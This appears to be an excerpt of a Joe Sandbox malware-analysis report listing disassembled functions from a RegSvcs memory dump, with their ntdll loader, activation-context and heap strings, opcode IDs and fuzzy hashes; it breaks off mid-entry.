                                                              • Instruction Fuzzy Hash: D8912672A41702AFD721EF68CC90B6A7BA9FB94B14F48465CFA42AF258C7709C01C795
                                                              Function 0159EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                              • Instruction ID: fe22e31b174e97f1e31f88c4ab10505159ae4bcaa453011ec58da2c3cc7beceb
                                                              • Opcode Fuzzy Hash: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                              • Instruction Fuzzy Hash: F1A22874A0562A8FDF64DF18CD887AEBBB5BF45304F1442EAD909AB250DB309E81CF51
                                                              Function 015C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                              • Instruction ID: 8d7b75a5455382d253eeee169b85ae14ca31f506f6abc449003d19a3ccca0948
                                                              • Opcode Fuzzy Hash: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                              • Instruction Fuzzy Hash: AB910470B00316AFDB3AAF98DC85BAEBBA1BB50B14F14425CDA016F3C1DBB09901C795
                                                              Function 0158645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E9A11, 015E9A3A
                                                              • apphelp.dll, xrefs: 01586496
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015E9A01
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015E9A2A
                                                              • LdrpInitShimEngine, xrefs: 015E99F4, 015E9A07, 015E9A30
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015E99ED
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: b35290789fce67f3f58b6a8bc802f8360ed364204db67cda5f668ea0c9ae8f4d
                                                              • Instruction ID: 2bfbd30a55d350deee2651dfdb88b91695c808962cc42f16e638eca6fe15ca9a
                                                              • Opcode Fuzzy Hash: b35290789fce67f3f58b6a8bc802f8360ed364204db67cda5f668ea0c9ae8f4d
                                                              • Instruction Fuzzy Hash: 42519F71608305AFE725EF24DC45AAFB7E9FF84648F40091DE585AF260D670E944CB92
                                                              Function 015C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 01602165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016021BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01602180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01602160, 0160219A, 016021BA
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01602178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0160219F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                              • Instruction ID: 70479e687f8b0c9c1813c5039002a8e0156343971cae9615e4fc9599cd2eb385
                                                              • Opcode Fuzzy Hash: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                              • Instruction Fuzzy Hash: E2312A36A40211BBE7128ED5DC89F5B7AB9FF54E40F0540ADBB04AF240D7709A01C6A0
                                                              Function 015CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CC6C3
                                                              • LdrpInitializeProcess, xrefs: 015CC6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01608181, 016081F5
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 016081E5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01608170
                                                              • LdrpInitializeImportRedirection, xrefs: 01608177, 016081EB
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: d0cb001743aa248665aad7c96c376f75fc13e30fadd768483816af5b3c4d701f
                                                              • Instruction ID: 3d1c9ef19e16245658153fdffde39ee118036a789d2028541097d6384ddfd47a
                                                              • Opcode Fuzzy Hash: d0cb001743aa248665aad7c96c376f75fc13e30fadd768483816af5b3c4d701f
                                                              • Instruction Fuzzy Hash: AD31E071644712AFC324EF68DD86E2B7795BFD4B24F040A6CF944AF291E660EC04C7A2
                                                              Function 015D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 015D2DF0: LdrInitializeThunk.NTDLL ref: 015D2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D74
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                              • Instruction ID: a29bbe668b590112b164c4d164c9a55b92ebfc049cd5c5fac63f90de54a538d1
                                                              • Opcode Fuzzy Hash: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                              • Instruction Fuzzy Hash: B6425A71900716DFDB25CF28C880BAAB7F5FF44314F1445AAE9899B282D770AA85CF60
                                                              Function 0159A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                              • Instruction ID: 0abf4257855c6b09729cf8ba5588c97204a98bfbd12837d044a299474b48c4a8
                                                              • Opcode Fuzzy Hash: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                              • Instruction Fuzzy Hash: 15C169746083829FDB21CF58C144B6AB7E4BF85704F04896EFA998F251E774C949CBA3
                                                              Function 015C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C8421
                                                              • LdrpInitializeProcess, xrefs: 015C8422
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015C855E
                                                              • @, xrefs: 015C8591
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                              • Instruction ID: 574bf112b7c7dfdc0caf7b82bf0e21cf7bfc036c6e7f3c8f17e0396f7fc9a3d6
                                                              • Opcode Fuzzy Hash: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                              • Instruction Fuzzy Hash: CD919E71508346AFE722DF65CC80EAFBAECBF94B44F40092EF6859A150E374D904CB62
                                                              Function 015C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 016021DE
                                                              • .Local, xrefs: 015C28D8
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016021D9, 016022B1
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016022B6
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                              • Instruction ID: 3f1facf24e6b014fa1ac4847276c1a8a2c62660d1c7d8a43c2725902871a29d5
                                                              • Opcode Fuzzy Hash: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                              • Instruction Fuzzy Hash: B5A19C3190022A9FDB25CFA8DC88BAAB7B1BF58754F1545EDD908AB251D7709EC0CF90
                                                              Function 015C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlDeactivateActivationContext, xrefs: 01603425, 01603432, 01603451
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01603437
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01603456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0160342A
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                              • Instruction ID: 29582c4a6ebe4e29e90d9f54958dde9cc1adaec5983934b099d3a2d4be2d916b
                                                              • Opcode Fuzzy Hash: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                              • Instruction Fuzzy Hash: E961FD366416129FDB278E5CCC92F2AB7E1FF80B11F15852DE8559F390DB30E8018B91
                                                              Function 015964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015F1028
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015F106B
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015F10AE
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015F0FE5
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                              • Instruction ID: 5c912b82d0b8419f707fbc1472d3fa86f8d0bd59909ea2bac73b5a626e0fca50
                                                              • Opcode Fuzzy Hash: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                              • Instruction Fuzzy Hash: 7071B0B19043069FCB21DF18C885B9B7BA9BF95764F844868F9488F186D734D588CBD2
                                                              Function 015C4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01603640, 0160366C
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0160362F
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 0160365C
                                                              • LdrpFindDllActivationContext, xrefs: 01603636, 01603662
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 0-3779518884
                                                              • Opcode ID: cb944319119d279bcb392f66471d2eddf761f7296ee36c2adc31daa69150c030
                                                              • Instruction ID: a2d550128816e4e603b5cf66810f571bd13a4027871274765d393381157bee9a
                                                              • Opcode Fuzzy Hash: cb944319119d279bcb392f66471d2eddf761f7296ee36c2adc31daa69150c030
                                                              • Instruction Fuzzy Hash: EA31F972A00651AEDF36BE8CCC69F3E76A4BB01F54F06416EE9055F261DBA0DC8087D5
                                                              Function 015B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA9A2
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015FA992
                                                              • apphelp.dll, xrefs: 015B2462
                                                              • LdrpDynamicShimModule, xrefs: 015FA998
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                              • Instruction ID: 5737df50f2a51b5261ae8b8c303ff5f631d19a748b2858119d04fcf500f8d061
                                                              • Opcode Fuzzy Hash: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                              • Instruction Fuzzy Hash: B8314671610202BBDB31AF59DD81EAE7BB4FB80B00F16012DEA056F345C7B0A851C791
                                                              Function 015A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015A327D
                                                              • HEAP[%wZ]: , xrefs: 015A3255
                                                              • HEAP: , xrefs: 015A3264
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                              • Instruction ID: 4681bb58c2f26c377d9a70c33667ef7b3dcf4282a5ba644cd7b8bb80acf91450
                                                              • Opcode Fuzzy Hash: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                              • Instruction Fuzzy Hash: E992DC70A442499FDB25CFA8C4457AEBBF1FF48304F5884A9E95AAF351D334A941CF50
                                                              Function 015A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                              • Instruction ID: 899a5227f074a1cfd4147768bb830d0cbe2a41cae65609bf3d428a3f67cea99c
                                                              • Opcode Fuzzy Hash: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                              • Instruction Fuzzy Hash: 34F19B30A50606DFEB25CF68C894B6EBBF5FB44304F5486A8E5469F391D730E981CB90
                                                              Function 015B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                              • Instruction ID: e90d2920bf5ef704da3b1441429fe58c46ca41138d25bb3f1500a1e873199468
                                                              • Opcode Fuzzy Hash: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                              • Instruction Fuzzy Hash: 88C25D716083459FDB25CF28C881BAFBBE5BFC8754F04892DEA898B291D734D845CB52
                                                              Function 0158A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                              • Instruction ID: f29983a5c6bfca4f9ca0771e46d44eb12c801ce49ca42f8b09a3a0749fec1160
                                                              • Opcode Fuzzy Hash: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                              • Instruction Fuzzy Hash: 58A13C71D1162A9BDB359F68CC88BADB7B8FF48710F1041EAD909AB250E7359E84CF50
                                                              Function 015B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA121
                                                              • LdrpCheckModule, xrefs: 015FA117
                                                              • Failed to allocated memory for shimmed module list, xrefs: 015FA10F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                              • Instruction ID: 3ef61e475d686ddc25d2fb1cc75a3214722d401e4d71753ae64ba604f75ece1a
                                                              • Opcode Fuzzy Hash: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                              • Instruction Fuzzy Hash: 4F71EC70A00206EFDB25EF68CC81ABEB7F4FB88704F15442DE906AF291E730A941CB51
                                                              Function 015A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                              • Instruction ID: ec933785e8d95cd12b8ad395f13cc1eedc889c3c3bc1967b0cd5f4f7dbbf6159
                                                              • Opcode Fuzzy Hash: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                              • Instruction Fuzzy Hash: 2E619D706603069FDB29DF28C940B6EBBE1FF44704F54855DE95A8F292D770E881CB91
                                                              Function 015CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016082E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 016082D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 016082DE
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                              • Instruction ID: 533c75133a2566ef4758803167121ee7c727d54acfcc8a87609da03ede72ae15
                                                              • Opcode Fuzzy Hash: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                              • Instruction Fuzzy Hash: 2D41D071550312ABC721EFA8DC44B5F7BE8FB98B54F004A2EB949DB290E770D8108B92
                                                              Function 0164C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164C1C5
                                                              • PreferredUILanguages, xrefs: 0164C212
                                                              • @, xrefs: 0164C1F1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                              • Instruction ID: c499b643916bef4a51ba988129c7cf8eeac2772d9f48b1dac4cae7a6f380fad4
                                                              • Opcode Fuzzy Hash: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                              • Instruction Fuzzy Hash: 38416271E1120AEBDB11DED9CC51FEFBBB8BB54704F14806AE605B7340E7B49A458B50
                                                              Function 01624144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                              • Instruction ID: d6f5a90e7c66356d33f3074fc264097ad29073c01750ff5a6f5e2b2d8083ac41
                                                              • Opcode Fuzzy Hash: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                              • Instruction Fuzzy Hash: 71410131A01A69CBEB229BE9CC44BACBBB8FF96340F244459D901EF381DB758901CF51
                                                              Function 01614755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01614888
                                                              • LdrpCheckRedirection, xrefs: 0161488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01614899
                                                              Memory Dump Source
